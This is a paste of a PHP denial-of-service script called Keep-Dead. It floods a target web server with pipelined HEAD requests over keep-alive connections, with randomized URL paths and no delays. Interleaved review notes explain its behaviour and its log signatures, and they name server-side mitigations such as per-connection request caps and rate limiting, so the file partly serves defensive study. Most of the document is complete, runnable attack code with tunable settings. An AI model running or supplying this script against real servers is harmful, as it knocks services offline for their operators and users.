Fromubiz

keep-dead.php

Jan 21st, 2017
  1. <?php
  2.  
  3. /*
  4. Keep-Dead (Version 1.14)
  5. http://www.esrun.co.uk/blog/keep-alive-dos-script/
  6.  
  7. A lightweight denial of service script that can be effective even when launched from low bandwidth connections.
  8.  
  9. Read and adjust the config options below as required. The default settings will work in most circumstances; allowing you
  10. to simply update the target_url
  11.  
  12. Only use this script against your own home servers for security research.
  13.  
  14. This script is primarily meant for use via the terminal; although it will also work if launched via the browser.
  15. */
  16.  
  17.  
  18. #########
  19. # Config
  20. #########
  21.  
  22. /* target_url
  23. The URL to be attacked. You should try and choose a resource intensive page such as a search
  24. or live stat page. Use %rand% for a random value to be automatically generated for each individual request
  25. */
  26. $target_url = "http://127.0.0.1:8080 ";
      // Review note: configuration globals start here; the code further down reads them directly.
      // As pasted, the target is the loopback address on port 8080. This string is later replaced by an
      // array of its parsed parts, so $target_url changes type further down the file.
  27.  
  28. /* max_requests
  29. The maximum number of requests to be made. If you're running this via command line, you can leave the value
  30. high and simply quit the script at any point . If you plan to run this via a web browser, I recommend setting this value to 5000
  31. */
  32. $max_requests = 100000000;
      // Review note: the pasted value is 100000000, not the 5000 suggested above for browser runs.
  33.  
  34. /* max_requests_per_connection
  35. The maximum number of requests to be made per connection. Maximum value is 100
  36. */
  37. $max_requests_per_connection = 100;
      // Review note: the send section clamps this value to the range 1..100 before using it.
  38.  
  39. /* delay_between_connections
  40. The number of seconds to delay between opening a new connection. Recommended value: 0.5
  41. */
  42. $delay_between_connections = 0;
  43.  
  44. /* delay_between_requests
  45. The number of seconds to delay between outgoing requests. Recommended value: 0.01
  46. */
  47. $delay_between_requests = 0;
      // Review note: both delays are 0 as pasted, not the 0.5 / 0.01 the comments recommend, so the
      // usleep() calls in the send loops are made with 0.
  48.  
  49. /* skip_check
  50. If the server you're attacking is already under strain and only sporadically accepting
  51. connections, you'll want to skip the Keep-Alive support check (change the value to 1)
  52. */
  53. $skip_check = 0;
      // Review note: 0 means the single "HEAD /" probe below runs before any other request is sent.
  54.  
  55. /* useragent
  56. Useragent to send with requests
  57. */
  58. $useragent = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7";
      // Review note: this one fixed string is sent verbatim in both the probe and every later request.
      // While left at this default it is a stable field to match on in access logs.
  59.  
  60.  
  61. ##############################
  62. # Do not edit below this line
  63. ##############################
  64.  
  65. //Check if Keep-Dead is being launched from a command prompt or browser
      // Review note: this section picks the output format ($lb) and the time limit, then prints the banner.
      // The key is read without isset(), so when it is absent (the command-line case being tested for)
      // PHP reports an undefined-index notice/warning before falling through to the else branch.
  66. if($_SERVER['SERVER_PROTOCOL']){
  67. $output_to_browser = 1;
  68. } else {
  69. $output_to_browser = 0;
  70. }
  71.  
  72. if($output_to_browser == 1){
  73. set_time_limit(300); //Limit script to run no longer than 300 seconds if launched via the web browser
  74. $lb = "<br>\n"; //Line break
  75.  
  76. //Header
  77. echo "<pre>
  78. _ __ ____ _
  79. | |/ /___ ___ _ __ | _ \ ___ __ _ __| |
  80. | ' // _ \/ _ \ '_ \ _____| | | |/ _ \/ _` |/ _` |
  81. | . \ __/ __/ |_) |_____| |_| | __/ (_| | (_| |
  82. |_|\_\___|\___| .__/ |____/ \___|\__,_|\__,_|
  83. |_| </pre>";
  84. echo "Keep-Dead (www.esrun.co.uk)".$lb.$lb;
  85. } else {
  86. set_time_limit(0); //No time limit when launched from command line
  87. $lb = "\n"; //Line break
  88.  
  89. //Header
  90. echo " _ __ ____ _ ".$lb;
  91. echo "| |/ /___ ___ _ __ | _ \ ___ __ _ __| |".$lb;
  92. echo "| ' // _ \/ _ \ '_ \ _____| | | |/ _ \/ _` |/ _` |".$lb;
  93. echo "| . \ __/ __/ |_) |_____| |_| | __/ (_| | (_| |".$lb;
  94. echo "|_|\_\___|\___| .__/ |____/ \___|\__,_|\__,_|".$lb;
  95. echo " |_| ".$lb;
  96. echo "Keep-Dead (www.esrun.co.uk)".$lb.$lb;
  97. }
  98.  
  99.  
  100. ########################################################
  101. # Function used for adding random string to request urls
  102. ########################################################
  103. function quick_rand(){
       // Returns a string of lowercase ASCII letters; the send loop substitutes it for the %rand%
       // placeholder in the request URL. Takes no parameters.
  104. $letters = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z");
  105. $rand_string = '';
       // rand(4,12) is re-evaluated on every pass of the loop condition, so the result is always 4 to 12
       // characters long but the lengths are not evenly distributed. For log review, the substituted
       // token is therefore a run of 4-12 characters from a-z.
  106. for($i=0;$i<rand(4,12);$i++){
  107. $rand_string.=$letters[array_rand($letters)];
  108. }
  109. return($rand_string);
  110. }
  111.  
  112. ########################################################
  113. # Parse the target URL to get the host, path and query
  114. ########################################################
  115. $target_url_parsed = parse_url($target_url);
       // Review note: splits the configured URL into host, path, query and port, then builds
       // $request_url (path plus optional query string) for the request line.
  116.  
       // $target_url is overwritten here: from this point on it is an array, not the configured string.
  117. $target_url = array();
  118. $target_url['host'] = $target_url_parsed['host'];
       // The @ prefix silences the notice raised when parse_url() returned no such component.
  119. @$target_url['path'] = $target_url_parsed['path'];
  120. @$target_url['query'] = $target_url_parsed['query'];
  121. @$target_url['port'] = $target_url_parsed['port'];
  122.  
  123. if(!$target_url['path']){
  124. $target_url['path'] = '/';
  125. }
  126.  
       // The scheme component is never read, so a URL without an explicit port always ends up on port 80.
  127. if(!$target_url['port']){
  128. $target_url['port'] = 80;
  129. }
  130.  
  131. if($target_url['query']){
  132. $request_url = $target_url['path']."?".$target_url['query'];
  133. } else {
  134. $request_url = $target_url['path'];
  135. }
  136.  
  137.  
  138. ################################################
  139. # Check if the remote host supports Keep-Alive
  140. ################################################
  141. if($skip_check != 1){
       // Review note: one-off probe. It opens a connection (3-second connect timeout), sends a single
       // HEAD request and reads the response headers, looking for "Connection: close".
  142. //Send request with Keep-Alive header
  143. $reply = '';
  144. $socket = fsockopen($target_url['host'], $target_url['port'], $errno, $errstr, 3);
  145. if(!$socket){
  146. die("Failed to open a connection to ".$target_url['host']." on port ".$target_url['port'].$lb);
  147. }
       // The probe always asks for "/", not the configured path, and spells the header name "HOST:" in
       // upper case; both details are visible on the wire and in request logging that records headers.
  148. $request = "HEAD / HTTP/1.1\r\nHOST: ".$target_url['host']."\r\nUser-Agent: ".$useragent."\r\nConnection: Keep-Alive\r\n\r\n";
  149. fwrite($socket, $request);
       // $incoming_data is assigned here and not referenced again in this file.
  150. $incoming_data = '';
       // Reads the reply in pieces of at most 127 bytes. If the stream reaches EOF before a blank line
       // is seen, the loop ends through feof() and the socket is not closed in this section.
  151. while (!feof($socket)){
  152. $buffer=fgets($socket, 128);
  153. $reply.=$buffer;
  154.  
  155. //Watch for end of reply and close socket/break out of loop
  156. if($buffer == "\r\n"){
  157. @fclose($socket); break;
  158. }
  159. }
  160.  
  161.  
  162. //Check if the reply to our above request includes 'Connection: close'. If so, the remote host doesn't support Keep-Alive
       // strpos() is an exact, case-sensitive substring match and its result is used as a truth value.
       // A server that answers with "Connection: close" makes the script fall back to one request per
       // connection, as the message below states.
  163. if(strpos($reply, "Connection: close")){
  164. echo $target_url['host']." does not support Keep-Alive! max_requests_per_connection will be set to 1, making this a much slower attack.\n\n";
  165. $max_requests_per_connection = 1;
  166. }
  167. }
  168.  
  169. ################
  170. # Send requests
  171. ################
  172.  
  173. //Most servers limit Keep-Alive sessions to 100 requests per connection
       // Review note: clamps the per-connection request count to 1..100, derives the number of
       // connections from it, then opens the connections one after another.
  174. if($max_requests_per_connection > 100){ $max_requests_per_connection = 100; }
  175. if($max_requests_per_connection < 1){ $max_requests_per_connection = 1; }
  176.  
  177. //Work out how many connections to make in order to fulfill the max_requests
  178. $max_connections = ceil($max_requests / $max_requests_per_connection);
  179.  
  180.  
  181. for($c=0;$c<$max_connections;$c++){ //Stay within our max_connections limit
  182. echo "Opening connection [".($c+1)."] to ".$target_url['host']."..";
  183. @$attack_socket = fsockopen($target_url['host'], $target_url['port'], $errno, $errstr, 3);
  184. if(!$attack_socket){
  185. echo "failed (".$errstr.")".$lb;
  186. } else {
  187. echo "success".$lb."Sending requests: |";
       // Server-side view of this inner loop: HEAD requests written back to back on one connection,
       // each carrying "HOST:" in upper case, the configured User-Agent and "Connection: Keep-Alive".
       // Nothing in the loop reads from the socket, so the script never consumes the responses.
       // Relevant controls: a cap on requests per keep-alive connection (Apache MaxKeepAliveRequests,
       // nginx keepalive_requests) and per-client request rate limiting (for example nginx limit_req).
  188. for($r=0;$r<$max_requests_per_connection;$r++){ //Stay within our max_requests_per_connection limit
  189. $request = "HEAD ".str_replace("%rand%", quick_rand(), $request_url)." HTTP/1.1\r\nHOST: ".$target_url['host']."\r\nUser-Agent: ".$useragent."\r\nConnection: Keep-Alive\r\n\r\n";
       // The write result is discarded and errors are silenced, so a "." is printed even if the write failed.
  190. @fwrite($attack_socket, $request);
  191. echo ".";
  192. usleep($delay_between_requests * 1000000); //Delay between requests
  193. }
  194. echo "|".$lb;
  195. }
       // Runs after a failed connect as well; the @ hides the resulting error.
  196. @fclose($attack_socket);
  197. echo "Closed connection".$lb;
  198.  
  199. usleep($delay_between_connections * 1000000);
  200. }
  201.  
  202. ?>